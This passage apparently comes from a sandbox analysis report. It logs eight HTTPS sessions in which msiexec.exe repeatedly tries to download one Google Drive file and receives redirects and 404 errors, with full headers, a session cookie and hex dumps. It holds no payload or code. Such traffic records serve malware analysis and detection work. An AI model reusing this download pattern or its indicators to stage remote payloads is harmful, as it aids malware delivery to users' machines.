https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49710	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:43:51 UTC	258	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-03 15:43:52 UTC	2229	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:43:52 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-ABLVDx_RIDQIwWAxcW5SDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC6N0MqpgTr3mXmL3BvIcKc5K-Bnu30U2byoJ1Vhe3LDKvgHB3raoW9g6t0fNZAPw31eIc2ebdjcVg Server: UploadServer Set-Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ; expires=Wed, 04-Jun-2025 15:43:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:43:52 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 73 65 6c 42 34 4e 65 7a 61 75 65 4f 73 70 51 30 65 70 33 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7selB4NezaueOspQ0ep3Yg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49711	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:43:54 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:43:55 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:43:55 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-G6Dm74XcAsQV_bO9BU8snQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49712	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:43:57 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:43:58 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:43:58 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-U_DTX1rNqJiHhLT7MhQq7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC7FRv6YdSB9wL2xR-zxuYwWjCyK_34fidWYGc4vRRF5NUJOb5b2SMf_0R2FzYY-tXDI_P7qxYvwrQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:43:58 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 76 64 56 57 69 38 78 62 36 6e 54 6c 4b 31 76 6e 4a 79 7a 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0vdVWi8xb6nTlK1vnJyzgw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49714	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:00 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:01 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:01 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-2uw2sFvyaD_T7d8IU1vgKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49715	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:03 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:04 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:03 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-QcdGmAdYilxKAr-VRYYgHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC7_P4xXhXBDLn0pqycST3WC2yXWEcpb6KiyW0aQ677lJcxTLOFygHUCqcS513hg462eiJxiFvunwg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:04 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 65 6e 57 4c 41 4e 58 75 58 65 75 47 4e 39 53 52 63 55 48 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1enWLANXuXeuGN9SRcUH1g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49716	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:06 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:06 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:06 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-v5DSUWoIfXJD5OULPQZCsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49717	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:08 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:09 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:09 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ejXqSIwE6xFF7rTC1_CalA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 X-GUploader-UploadID: AFiumC6uaC23Ma87UXoh5ekwYA0hY1YFZdrpS8UJd3mIwLOBoZTS811bIJMxthX9xKGLVyexoErtes0QzQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:09 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 51 45 50 55 5f 52 4a 4d 6a 6d 51 30 76 6a 2d 5a 76 70 65 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xQEPU_RJMjmQ0vj-ZvpekQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49718	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:11 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:12 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:12 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-F59ITLjwZL2m3ZieyE9NWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, 